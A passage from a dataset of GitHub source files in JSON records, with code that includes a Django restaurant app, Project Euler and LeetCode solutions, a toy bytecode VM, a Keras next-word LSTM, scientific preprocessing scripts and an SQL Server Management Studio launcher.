platoNuevo.save()\n \n\n return render(request, 'platos.html', diccionarioEnvioDatos)\n\ndef EmpleadosVista(request):\n\n formularioEmpleados = FormularioRegistroEmpleados()\n\n diccionarioEnvioDatosEmpleados={\n 'formEmpleados': formularioEmpleados\n }\n\n if request.method == 'POST':\n datosFormulario = FormularioRegistroEmpleados(request.POST)\n \n if datosFormulario.is_valid():\n datosLimpios = datosFormulario.cleaned_data\n empleadoNuevo= Empleados(\n nombre= datosLimpios[\"nombreEmpleado\"],\n apellido=datosLimpios[\"apellidoEmpleado\"], \n telefono=datosLimpios[\"telefonoEmpleado\"], \n cargo=datosLimpios[\"cargoEmpleado\"]\n )\n empleadoNuevo.save()\n\n return render(request, 'empleados.html', diccionarioEnvioDatosEmpleados)\n","repo_name":"NataliaVera/Restaurante---Python-Django","sub_path":"config/web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9377101515","text":"\"\"\"\nA Pythagorean triplet is a set of three natural numbers, a < b < c, for which a^2 + b^2 = c^2.\n\nFor example, 3^2 + 4^2 = 9 + 16 = 25 = 5^2.\n\nThere exists exactly one Pythagorean triplet for which a + b + c = 1000.\n\nFind the product abc.\n\"\"\"\n\ndef main():\n \"\"\"\n >>> main()\n 31875000\n \"\"\"\n for a in range(1, 1000 // 3):\n for b in range(a, (1000 - a) // 2):\n c = 1000 - a - b\n if a**2 + b**2 == c**2:\n return a * b * c\n\n\nif __name__ == '__main__':\n import doctest; doctest.testmod(verbose=True)\n\n","repo_name":"neilmarshall/Project_Euler","sub_path":"009/PE_9.py","file_name":"PE_9.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"42957651887","text":"import logging\n\nclass InvalidBytecodeError(Exception):\n def __init__(self, bytecode):\n self.bytecode = bytecode\n\n def __str__(self):\n return repr(self.bytecode)\n\n\nclass Bytecode(object):\n \"\"\" A bytecode in our simple virtual machine.\"\"\"\n opcodes = {}\n\n def __init__(self, name, opcode, operand_count=0):\n self.name = name\n self.opcode = opcode\n self.operand_count = operand_count\n self.logger = logging.getLogger(__name__)\n Bytecode.opcodes[self.opcode] = self\n\n def __str__(self):\n return \"Bytecode name: {}\\topcode: {:02d}\\toperand_count: {:02d}\".format(\n self.name.ljust(10), self.opcode, self.operand_count)\n\n def dump_bytecode(self):\n return \"{} ({})\".format(self.name, self.operand_count)\n\n @classmethod\n def to_instruction_from_opcode(cls, opcode):\n return cls.opcodes[opcode]\n\n\nINVALID = Bytecode(\"INVALID\", 0)\nIADD = Bytecode(\"IADD\", 1)\nISUB = Bytecode(\"ISUB\", 2)\nIMUL = Bytecode(\"IMUL\", 3)\nIEQ = Bytecode(\"IEQ\", 5)\nILT = Bytecode(\"ILT\", 4)\nBR = Bytecode(\"BR\", 6, 1)\nBRT = Bytecode(\"BRT\", 7, 1)\nBRF = Bytecode(\"BRF\", 8, 1)\nICONST = Bytecode(\"ICONST\", 9, 1)\nLOAD = Bytecode(\"LOAD\", 10, 1)\nGLOAD = Bytecode(\"GLOAD\", 11, 1)\nSTORE = Bytecode(\"STORE\", 12, 1)\nGSTORE = Bytecode(\"GSTORE\", 13, 1)\nPUTS = Bytecode(\"PUTS\", 14)\nPOP = Bytecode(\"POP\", 15, 1)\nCALL = Bytecode(\"CALL\", 16, 2)\nRET = Bytecode(\"RET\", 17)\nHALT = Bytecode(\"HALT\", 18)\n","repo_name":"skk/simple_virtual_machine","sub_path":"src/simple-virtual-machine/simplevirtualmachine/bytecodes.py","file_name":"bytecodes.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13985878445","text":"# https://www.acmicpc.net/problem/14653\nimport sys\nsys.stdin = open('input.txt')\ninput = sys.stdin.readline\n\nN, K, Q = map(int, input().split())\n\nname = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\nname = name[:N]\nname.remove('A')\nmessages = [list(map(str, input().split())) for _ in range(K)]\n\nif int(messages[Q-1][0]) == 0:\n print(-1)\nelse:\n for message in messages:\n if int(message[0]) >= int(messages[Q-1][0]):\n if message[1] in name:\n name.remove(message[1])\n\n print(*name)","repo_name":"WChan1027/Problem","sub_path":"Baekjoon/Silver/14653. 너의 이름은.py","file_name":"14653. 너의 이름은.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26148630059","text":"#300. Longest Increasing Subsequence\ndef lengthOfLIS(self, nums: List[int]) -> int:\n if not nums or len(nums) == 0: return 0\n \n dp = [1] * len(nums)\n \n for i in range(len(nums)-1, -1, -1):\n for j in range(i+1, len(nums), 1):\n if nums[i] < nums[j]:\n dp[i] = max(dp[i],1+dp[j])\n \n return max(dp)\n \n#673. Number of Longest Increasing Subsequence\ndef findNumberOfLIS(self, nums: List[int]) -> int:\n length = [1] * len(nums) # length store longest ending at nums[i]\n count = [1] * len(nums) # count store the number of longest at nums[i]\n \n for i in range(len(nums)):\n for j in range(0, i, 1):\n if nums[j] < nums[i]:\n if length[i] < length[j] + 1:\n # update because find longer one\n length[i] = length[j] + 1\n # update count\n count[i] = count[j]\n elif length[i] == length[j] + 1:\n # another same result\n # print(length[i], \" \", length[j]+1)\n count[i] += count[j]\n maxlen = max(length)\n print(length)\n print(count)\n return sum([count[i] for i in range(len(nums)) if maxlen == length[i]]) # consider[2,2,2,2,2] => 5\n ","repo_name":"yuchangrachel/algorithm","sub_path":"needorganize/dp/subsequence/300.673. Longest Increasing Subsequence.py","file_name":"300.673. Longest Increasing Subsequence.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12400327951","text":"import os\n\nfrom dotenv import load_dotenv\n\nfrom models.buildings_generator import BuildingsGenerator\n\nload_dotenv(os.path.join(os.getcwd(), '.env'))\n\nif __name__ == '__main__':\n generator = BuildingsGenerator(\n -26.26,\n -12.24,\n 62.48,\n 67.25,\n os.environ['S3_BUCKET'],\n 'iceland'\n )\n buildings = generator.generate()\n with open('output/iceland_buildings.geojson', 'w') as file_:\n file_.write(buildings)","repo_name":"mariamrf/athena-buildings","sub_path":"get_buildings.py","file_name":"get_buildings.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"22923430347","text":"import solara\n\n# Declare reactive variables at the top level. Components using these variables\n# will be re-executed when their values change.\nsentence = solara.reactive(\"Solara makes our team more productive.\")\nword_limit = solara.reactive(10)\n\n\n# in case you want to override the default order of the tabs\nroute_order = [\"/\", \"settings\", \"chat\", \"clickbutton\"]\n\n@solara.component\ndef Page():\n with solara.Column(style={\"padding-top\": \"30px\"}):\n solara.Title(\"Solarathon example project\")\n # Calculate word_count within the component to ensure re-execution when reactive variables change.\n word_count = len(sentence.value.split())\n\n solara.SliderInt(\"Word limit\", value=word_limit, min=2, max=20)\n solara.InputText(label=\"Your sentence\", value=sentence, continuous_update=True)\n\n # Display messages based on the current word count and word limit.\n if word_count >= int(word_limit.value):\n solara.Error(f\"With {word_count} words, you passed the word limit of {word_limit.value}.\")\n elif word_count >= int(0.8 * word_limit.value):\n solara.Warning(f\"With {word_count} words, you are close to the word limit of {word_limit.value}.\")\n else:\n solara.Success(\"Great short writing!\")\n\n solara.Markdown(\"*First exercise*: remove this text and write your own sentence.\")\n\n\n@solara.component\ndef Layout(children):\n # this is the default layout, but you can override it here, for instance some extra padding\n return solara.AppLayout(children=children, style={\"padding\": \"20px\"})\n","repo_name":"widgetti/solarathon","sub_path":"solarathon/pages/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"40641750255","text":"import curses\r\nimport os\r\nimport sys\r\n\r\nimport globals as g\r\nimport input\r\nimport render\r\nimport util\r\nfrom lib_ext.bindings import livesplit_core as lsc\r\n\r\n\r\ndef init_lcs():\r\n # g.run init\r\n try:\r\n frun = open(g.settings['files']['run'], \"rb\")\r\n except FileNotFoundError:\r\n util.abort_error(\"run file \" + g.settings['files']['run'] + \" does not exist\")\r\n # noinspection PyUnboundLocalVariable\r\n prun = lsc.Run.parse(*util.data_len_for_file(frun), g.settings['files']['runsave'], False)\r\n if not prun.parsed_successfully():\r\n util.abort_error(\"parsing run \" + g.settings['files']['run'] + \" failed.\")\r\n run = prun.unwrap()\r\n if not run:\r\n util.abort_error(\"run intialization failed\")\r\n\r\n # g.timer init\r\n g.timer = lsc.Timer.new(run)\r\n if not g.timer:\r\n util.abort_error(\"timer intialization failed\")\r\n\r\n # g.layout init\r\n try:\r\n flayout = open(g.settings['files']['layout'], \"rb\")\r\n except FileNotFoundError:\r\n util.abort_error(\"layout file \" + g.settings['files']['layout'] + \" does not exist\")\r\n # noinspection PyUnboundLocalVariable\r\n ext = os.path.splitext(flayout.name)[1]\r\n # noinspection PyBroadException\r\n try:\r\n if ext == \".lsl\":\r\n g.layout = lsc.Layout.parse_original_livesplit(*util.data_len_for_file(flayout))\r\n if ext == \".json\" or ext == \".ls1l\":\r\n g.layout = lsc.Layout.parse_json(flayout.read())\r\n if not g.layout:\r\n raise ValueError\r\n except:\r\n util.abort_error(\"parsing layout \" + g.settings['files']['layout'] + \" failed.\")\r\n\r\n\r\ndef init_settings():\r\n # g.settings init\r\n # noinspection PyBroadException\r\n try:\r\n g.settings = util.readsettings(\"res/settings.json\")\r\n\r\n if len(sys.argv) > 1:\r\n g.settings['files']['run'] = sys.argv[1]\r\n elif 'run' not in g.settings['files']:\r\n g.settings['files']['run'] = \"res/splits.lss\"\r\n # empty runsave path? use run path\r\n if not g.settings['files']['runsave']:\r\n g.settings['files']['runsave'] = g.settings['files']['run']\r\n\r\n if len(sys.argv) > 2:\r\n g.settings['files']['layout'] = sys.argv[2]\r\n elif 'layout' not in g.settings['files']:\r\n g.settings['files']['layout'] = \"res/layout.json\"\r\n\r\n if 'startsplit' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['startsplit'] = 'space'\r\n if 'reset' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['reset'] = '-'\r\n if 'undosplit' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['undosplit'] = '0'\r\n if 'skipsplit' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['skipsplit'] = '+'\r\n if 'pause' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['pause'] = 'enter'\r\n if 'previouscomparison' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['previouscomparison'] = '7'\r\n if 'nextcomparison' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['nextcomparison'] = '9'\r\n if 'toggleenable' not in g.settings['hotkeys']:\r\n g.settings['hotkeys']['toggleenable'] = '/'\r\n except:\r\n util.abort_error(\"settings intialization failed\")\r\n\r\n\r\ndef main():\r\n init_settings()\r\n init_lcs()\r\n input.init()\r\n curses.wrapper(render.init)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"peb-adr/TermSplit","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74265031480","text":"# Lab 04 - Flow control: if, elif and else\n# Author: Tanja Juric\n\nx = int (input (\"Please enter a number: \"))\n\nif (x % 2) == 0:\n print (x, \"is even.\")\nelse: \n print (x, \"is odd.\")\n\n","repo_name":"Tanja888/PS","sub_path":"week04/isEven.py","file_name":"isEven.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31763870554","text":"\"\"\"\nFile: pencil_sketch.py\n----------------\nNot part of the assignment. This was a lecture demo!\nThis is a fun algorithm to implement. It is not in the\nassignment, but feel free to implement it as an extension.\nPut the smaller foreground picture into the background.\nDo not include any pixels that are sufficiently blue.\n\"\"\"\n\nfrom simpleimage import SimpleImage\n\nINTENSITY_THRESHOLD = 1.8\n\n\ndef main():\n foreground = SimpleImage('images/tiefighter.jpg')\n background = SimpleImage('images/quad.jpg')\n bluescreen(foreground, background)\n background.show()\n\n\ndef bluescreen(foreground, background):\n for pixel in foreground:\n avg_pixel = (pixel.red + pixel.green + pixel.blue) / 3\n if pixel.blue <= (avg_pixel * INTENSITY_THRESHOLD):\n x = pixel.x\n y = pixel.y\n background.set_pixel(x, y, pixel)\n\n\nif __name__ == '__main__':\n main()","repo_name":"vsingh1998/Code_in_place","sub_path":"Assignments/3/Assignment3/blue_screen.py","file_name":"blue_screen.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24525306673","text":"import numpy as np\nimport random\nimport pandas as pd\nimport sys\nimport os\nimport time\nimport codecs\nimport collections\nimport numpy\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import LSTM\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.utils import np_utils\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nimport scipy\nfrom scipy import spatial\nfrom nltk.tokenize.toktok import ToktokTokenizer\nimport re\nfrom collections.abc import Iterable\n# leemos un dataset\nfile_content = pd.read_csv('spam.csv', encoding = \"ISO-8859-1\")\nEmail_Data = file_content[[ 'text']]\nlist_data = Email_Data.values.tolist()\n#print(list_data)# DATOS\ndef flatten(items):\n \"\"\"Yield items from any nested iterable\"\"\"\n for x in items:\n if isinstance(x, Iterable) and not isinstance(x, (str, bytes)):\n for sub_x in flatten(x):\n yield sub_x\n else:\n yield x\n#convierto la lista en STRINGS\nTextData=list(flatten(list_data))\ntexto =''\nfor i in TextData:\n texto +=i[0]\n\nTextData =texto\n#preprocesamos el texto sacandole por ej lineas nuevas, convirtiendo en minusculas entre otras...\nTextData = TextData.replace('\\n','')\nTextData = TextData.lower()\npattern = r'[^a-zA-z0-9\\s]'\nTextData = re.sub(pattern, '', ''.join(TextData))\n#realizamos la tokenizacion\ntokenizer = ToktokTokenizer()\ntokens = tokenizer.tokenize(TextData)\ntokens = [token.strip() for token in tokens]\n#obtenemos las palabritas y las ordenamos\nword_counts = collections.Counter(tokens)\nword_c = len(word_counts)\nprint(word_c)\ndistinct_words = [x[0] for x in word_counts.most_common()]\ndistinct_words_sorted = list(sorted(distinct_words))\n#generamos un indice para todas las palabritas\nword_index = {x: i for i, x in enumerate(distinct_words_sorted)}\n#largo de la ORACION\nsentence_length = 25\n#preparammos los datos para el modelo\n#vamos a generar secuencias de palabras\n#input = oraciones de entrada con indice\n#output = oraciones de salida con indice\nInputData = []\nOutputData = []\nfor i in range(0, word_c - sentence_length, 1):\n X = tokens[i:i + sentence_length]\n Y = tokens[i + sentence_length]\n InputData.append([word_index[char] for char in X])\n OutputData.append(word_index[Y])\nprint (InputData[:1])\nprint (\"\\n\")\nprint(OutputData[:1])\n#generamos X\nX = numpy.reshape(InputData, (len(InputData), sentence_length, 1))\n#hacemos el one hot encode de la variable de salida\n# One hot encode the output variable\nY = np_utils.to_categorical(OutputData)\n#Vamos a definir el modelos LSTM con 256 unidades de memoria\n#definimos el modelo:\nmodel = Sequential()\nmodel.add(LSTM(256, input_shape=(X.shape[1], X.shape[2])))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(Y.shape[1], activation='softmax'))\nmodel.compile(loss='categorical_crossentropy', optimizer='adam')\n#definimos un 'checkpoint'\nfile_name_path=\"weights-improvement-{epoch:02d}-{loss:.4f}.hdf5\"\ncheckpoint = ModelCheckpoint(file_name_path, monitor='loss', \nverbose=1, save_best_only=True, mode='min')\ncallbacks = [checkpoint]\n#VARIABLES\nEPOCH = 5\nBATCH_SIZE = 128\n#entrenamos el modelo\nmodel.fit(X, Y, epochs=EPOCH, batch_size=BATCH_SIZE, callbacks=callbacks)\n#esto nos genero unos archivitos que los vamos a cargar para usar. Estos son los weights de la red neuronal\n#va a tirar error la primera vez que se ejecute, pq no va a encontrar el archivo despues anda bien\nfile_name = \"weights-improvement-05-7.2197.hdf5\"\nmodel.load_weights(file_name)\nmodel.compile(loss='categorical_crossentropy', optimizer='adam')\n###############PRUEBA####################\n#genero secuencias random\nstart = numpy.random.randint(0, len(InputData))\ninput_sent = InputData[start]\n#generamos el indice de la siguiente palabrita del mail (Lo que vamos a predecir)\nX = numpy.reshape(input_sent, (1, len(input_sent), 1))\npredict_word = model.predict(X, verbose=0)\nindex = numpy.argmax(predict_word)\nprint(input_sent)\nprint (\"\\n\")\nprint(index)\n#traducimos la salida\nword_index_rev = dict((i, c) for i, c in enumerate(tokens))\nresult = word_index_rev[index]\nsent_in = [word_index_rev[value] for value in input_sent]\nprint(sent_in)\nprint (\"\\n\")\nprint(result)\n","repo_name":"Luminicen/NLP-Lanto","sub_path":"predicting_the_next_word.py","file_name":"predicting_the_next_word.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"194885980","text":"#!/usr/env/python3\n## Provide robust information for a QM PDB (created using mda-qm-part1.py)\n\nimport pandas as pd\n\n## Read in the space-delimited BASIS_verification file\ndf = pd.read_csv('BASIS_verification.txt', sep=r'\\s{1,}', engine='python', \\\n header=0)\n\n## Remove the PB rows\ndf = df[df.Type != 'PB']\n\n## Reindex, then force index to start at '1' instead of '0'\ndf = df.reset_index()\ndf.index += 1\n\n## Add a column with the new QM PDB indexing\ndf['QM_PDB'] = df.index\n\n## Write a new file with the QM_PDB_ID indexing\nwith open(\"PDB_verification.txt\", \"w+\") as bv_out:\n bv_out.write(\"QM_PDB_ID AtomName ResName ResNum Regions_ID TINKER_ID BASIS_ID Type\\n\")\n for r in df.itertuples(index=True, name='Pandas'):\n bv_out.write(\"{:<9} {:<8} {:<7} {:<6} {:<10} {:<9} {:<8} {:<5}\\n\".format(\\\n r.QM_PDB, r.AtomName, r.ResName, r.ResNum, r.Regions_ID, r.TINKER_ID,\\\n r.BASIS_ID, r.Type))\n bv_out.close()\n","repo_name":"emleddin/research-scripts","sub_path":"LICHEM-tools/qm-pdb-map.py","file_name":"qm-pdb-map.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"25966396157","text":"\"\"\"Init file for CHESS users\"\"\"\n\nfrom importlib import reload\n\nimport multiprocessing\nimport numpy as np\n\nfrom hexrd.imageseries import stats\nfrom hexrd.imageseries.process import ProcessedImageSeries\nfrom hexrd import imageseries\n\nimport chess\n\n# chess.darkframes_dflt = 10 # testing\n\nncpus = int(np.round(0.5*multiprocessing.cpu_count()))\nnrows = 3888\nncols = 3072\nrectangles = {\n '0_0': np.array([[0, nrows//2], [0, ncols//2]]),\n '1_0': np.array([[nrows//2, nrows], [0, ncols//2]]),\n '0_1': np.array([[0, nrows//2], [ncols//2, ncols]]),\n '1_1': np.array([[nrows//2, nrows], [ncols//2, ncols]])\n}\n\ncycle = '2021-1'\nstation = 'id3a'\nuser = 'pagan-1108-2'\n\n\n'''\nsample_info = {\n 'fd1-q-1' :np.arange(12, 68),\n 'fd1-a-1':np.arange(4, 98),\n 'fd2-q-1':np.hstack([2, np.arange(10, 87)]),\n 'fd2-a-1':np.hstack([3, np.arange(11, 25), np.arange(26, 40), np.arange(54, 79)])\n}\n\nsample_info = {\n 'mruby-0129':[4, ]\n}\n'''\n\nsample_info = {\n 'mruby-0120a':np.arange(1,2)\n}\n\ndo_subpanels = False\n\nsave_fmt = 'frame-cache'\n\nims_options_dict = dict(\n ff1=chess.ImageSeriesOpts(flip='v'),\n ff2=chess.ImageSeriesOpts(flip='h')\n)\n\n# %% functions\n\ndef process_raw_mp_init(params):\n global paramMP\n paramMP = params\n\n\ndef process_raw_mp(scan_id):\n threshold = paramMP['threshold']\n opts_dict = paramMP['ims_options']\n parser = paramMP['parser']\n do_subpanels = paramMP['do_subpanels']\n\n fname_tmpl = \"%s_%04d-%s.npz\"\n imsd = parser.imageseries_dict(scan_id, opts_dict)\n for panel_id, ims in imsd.items():\n if do_subpanels:\n for subpanel_id, rect in rectangles.items():\n pims = ProcessedImageSeries(\n ims,\n [('rectangle', rect), ]\n )\n output_fname = fname_tmpl % (\n parser.runinfo.name,\n scan_id,\n '_'.join([panel_id, subpanel_id])\n )\n if save_fmt == 'frame-cache':\n parser.write_fc(pims, output_fname, threshold)\n elif save_fmt == 'hdf5':\n imageseries.write(pims, output_fname, format='hdf5', path='/imageseries')\n else:\n output_fname = fname_tmpl % (\n parser.runinfo.name,\n scan_id,\n panel_id\n )\n if save_fmt == 'frame-cache':\n parser.write_fc(ims, output_fname, threshold)\n elif save_fmt == 'hdf5':\n imageseries.write(ims, output_fname, format='hdf5', path='/imageseries')\n\n# run\n\nfor sample_name, scan_ids in sample_info.items():\n runinfo = chess.RunInfo(\n cycle=cycle,\n station=station,\n user=user,\n name=sample_name\n )\n\n '''\n p = chess.Parser(runinfo)\n imf_dict = p.imagefiles_dict(scanid)\n raw_dict = p.raw_imageseries_dict(scanid)\n '''\n\n params = dict(\n threshold=250,\n ims_options=ims_options_dict,\n parser=chess.Parser(runinfo),\n do_subpanels=do_subpanels\n )\n\n # import pdb;pdb.set_trace()\n\n print(\"INFO:\\tprocessing '%s'\" % sample_name)\n pool = multiprocessing.Pool(\n min(ncpus, len(scan_ids)),\n process_raw_mp_init, (params, )\n )\n result = pool.map(process_raw_mp, scan_ids)\n pool.close()\n","repo_name":"rachelelim/HEDM_code","sub_path":"dex_distortion_2021-02-10/preprocess_dex.py","file_name":"preprocess_dex.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30577994879","text":"\"\"\"\r\nPurpose:Connect to SQL Server using Enterprise Manager with Windows Authentication\r\nDate Programmer Description\r\nJuly 20, 2018 Yury Stanev Original\r\nTODO: convert to '.exe' using 'pyinstaller -F ssms.py' on Windows\r\n\"\"\"\r\n\r\nimport sqlite3 # creates connection to the DB file\r\nfrom prettytable import from_db_cursor\r\nimport getpass\r\nimport subprocess # allows you to spawn new processes, connect to their input/output/error pipes\r\nimport time\r\nimport pyautogui\r\n\r\nconn = sqlite3.connect('users2.sqlite')\r\nc = conn.cursor() # allows to perform SQL operations\r\n\r\n\r\n# Functions\r\ndef get_app_id():\r\n # list all the applications\r\n c.execute(\"SELECT DISTINCT * FROM apps ORDER BY appid ASC\")\r\n table = from_db_cursor(c)\r\n print(table)\r\n\r\n app_id = input(\"Pick app code: \")\r\n while app_id == \"\":\r\n app_id = input(\"Pick app code: \")\r\n\r\n return ''.join(app_id) # ''.join() is used to convert a tuple to a string\r\n\r\n\r\ndef get_group_id(app_id):\r\n # list the group IDs associated with the application\r\n c.execute(\"SELECT DISTINCT id, name FROM groups WHERE appid = '%s'\" % app_id)\r\n table = from_db_cursor(c)\r\n print(table)\r\n\r\n group_id = input(\"Pick group ID: \")\r\n while group_id == \"\":\r\n group_id = input(\"Pick group ID: \")\r\n\r\n c.execute(\"SELECT DISTINCT name FROM groups WHERE id = '%s'\" % group_id)\r\n group_id = c.fetchone()\r\n\r\n pswd = getpass.getpass() # have to use 'terminal', default prompt: 'Password: '\r\n\r\n return ''.join(group_id), pswd\r\n\r\n\r\ndef get_instance(app_id):\r\n # list the instances associated with the application\r\n c.execute(\"SELECT DISTINCT id, name FROM instances WHERE appid = '%s'\" % app_id)\r\n table = from_db_cursor(c)\r\n print(table)\r\n\r\n instance_name = input(\"Pick instance name: \")\r\n while instance_name == \"\":\r\n instance_name = input(\"Pick instance name: \")\r\n\r\n c.execute(\"SELECT DISTINCT name FROM instances WHERE id = '%s'\" % instance_name)\r\n instance_name = c.fetchone()\r\n\r\n return ''.join(instance_name)\r\n\r\n\r\ndef pick_sql_version(instance_name):\r\n # create an easy list to pick from\r\n sql_year = ['2012', '2014', '2016']\r\n for i, val in enumerate(sql_year, start=1):\r\n print(i, \" SQL Server Management Studio \", val)\r\n\r\n sql_version = input(\"Pick the SSMS version: \")\r\n while sql_version == \"\":\r\n sql_version = input(\"Pick the SSMS version: \")\r\n\r\n # depending on the sql version path might vary\r\n version_d = {\r\n '1': '110',\r\n '2': '120',\r\n '3': '130'\r\n }\r\n\r\n # If invalid path is chosen fall back to default (120)\r\n path = '\"C:/Program Files (x86)/Microsoft SQL Server/{}/Tools/Binn/ManagementStudio/Ssms.exe -S '.format(\r\n version_d.get(sql_version, '120')) + instance_name + '\"'\r\n\r\n return path\r\n\r\n\r\ndef command_builder(path, group_id): # builds a command used to launch SSMS\r\n command = 'runas /netonly /user:' + group_id + \" \" + path\r\n return command\r\n\r\n\r\ndef start_ssms(command, pswd):\r\n subprocess.Popen(['start', '/wait', 'cmd'], shell=True)\r\n time.sleep(1)\r\n\r\n pyautogui.typewrite(command) # enters the command to start SSMS\r\n pyautogui.press('enter')\r\n pyautogui.typewrite(pswd) # enter password\r\n pyautogui.press('enter')\r\n\r\n\r\n# Functions Calls\r\ndef main():\r\n app_id = get_app_id() # stores returned value, allows values to be passed around and accessed later\r\n instance = get_instance(app_id)\r\n path = pick_sql_version(instance)\r\n group_id, pswd = get_group_id(app_id)\r\n command = command_builder(path, group_id)\r\n start_ssms(command, pswd)\r\n\r\n\r\nmain()\r\n","repo_name":"ystanev/ssms_launcher","sub_path":"ssms.py","file_name":"ssms.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26611622098","text":"import streamlit as st\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.chains import ConversationalRetrievalChain\nfrom langchain.prompts.prompt import PromptTemplate\nfrom langchain.callbacks import get_openai_callback\nfrom langchain.memory import ConversationBufferMemory\nfrom modules.sidebar import Sidebar\nimport langchain\nlangchain.verbose = False\n\nclass Chatbot:\n\n def __init__(self, model_name, temperature, vectors):\n self.model_name = model_name\n self.temperature = temperature\n self.vectors = vectors\n \n\n def conversational_chatbot(self, query):\n \"\"\"\n Start a conversational chat with a model via Langchain\n \"\"\"\n llm = ChatOpenAI(model_name=self.model_name, temperature=self.temperature)\n #chain_type = 'refine' or map_rank #we can use this also\n #chain_type = 'stuff' which acts as default\n retriever = self.vectors.as_retriever()\n memory = ConversationBufferMemory(\n memory_key=\"chat_history\",\n return_messages=True #returns chat history as a list of messages as opposed to a single string\n)\n template = \"\"\"Given an uploaded file, take the query and answer it based on the uploaded file then take up\n a follow up query, rephrase the follow up query to be a standalone question, in its original language. Also\n say \"Thanks for asking this question\" after every query. If you don't know the answer say \"Sorry, I don't \n know the answer to this question.\", don't make up your own answer. Be polite and fluent in your answers\n Chat History:\n {chat_history}\n Follow Up Input: {query}\n Standalone question:\"\"\"\n CONDENSE_QUESTION_PROMPT = PromptTemplate.from_template(template)\n\n \n chain = ConversationalRetrievalChain.from_llm(llm=llm, memory=memory,condense_question_prompt=CONDENSE_QUESTION_PROMPT,\n retriever=retriever,verbose=True, return_source_documents=False)\n \n chain_input = {\"question\": query, \"chat_history\": st.session_state[\"history\"]}\n result = chain(chain_input)\n\n st.session_state[\"history\"].append((query, result[\"answer\"]))\n return result[\"answer\"]\n \n \n","repo_name":"Asikni/LLM_Based_Chatbot","sub_path":"src/modules/chatbot_main.py","file_name":"chatbot_main.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28806317930","text":"# import os\nimport pickle\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\nfrom util.config import *\nfrom rnn.mydatasets import VisitSequenceWithLabelDataset, visit_collate_fn\nfrom rnn.lstm import MyLSTM\nfrom util.plots import plot_learning_curves, save_fig\nfrom util.utils import train, evaluate\nfrom other_models.ac_util import plot_confusion_matrix, calc_scores\n\nlogger = logging.getLogger(__name__)\n\nNUM_EPOCHS = 100\nBATCH_SIZE = 8\nUSE_CUDA = False # Set 'True' if you want to use GPU\nNUM_WORKERS = 1\ncriterion = nn.CrossEntropyLoss()\n\ntrain_seqs = pickle.load(open(PATH_TRAIN_SEQS, 'rb'))\ntrain_labels = pickle.load(open(PATH_TRAIN_LABELS, 'rb'))\nvalid_seqs = pickle.load(open(PATH_VALID_SEQS, 'rb'))\nvalid_labels = pickle.load(open(PATH_VALID_LABELS, 'rb'))\ntest_seqs = pickle.load(open(PATH_TEST_SEQS, 'rb'))\ntest_labels = pickle.load(open(PATH_TEST_LABELS, 'rb'))\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() and USE_CUDA else \"cpu\")\n\ndef test_dataset():\n return VisitSequenceWithLabelDataset(test_seqs, test_labels, num_features)\n\ndef test_loader():\n return DataLoader(dataset=test_dataset(), batch_size=1, shuffle=False, collate_fn=visit_collate_fn,\n num_workers=NUM_WORKERS)\n\n\ndef predict_mortality(model, device, data_loader):\n model.eval()\n probas = []\n # reference: https://medium.com/@josh_2774/deep-learning-with-pytorch-9574e74d17ad\n with torch.no_grad():\n for idx, (inputs, labels) in enumerate(data_loader):\n out = model.forward(inputs)\n proba = 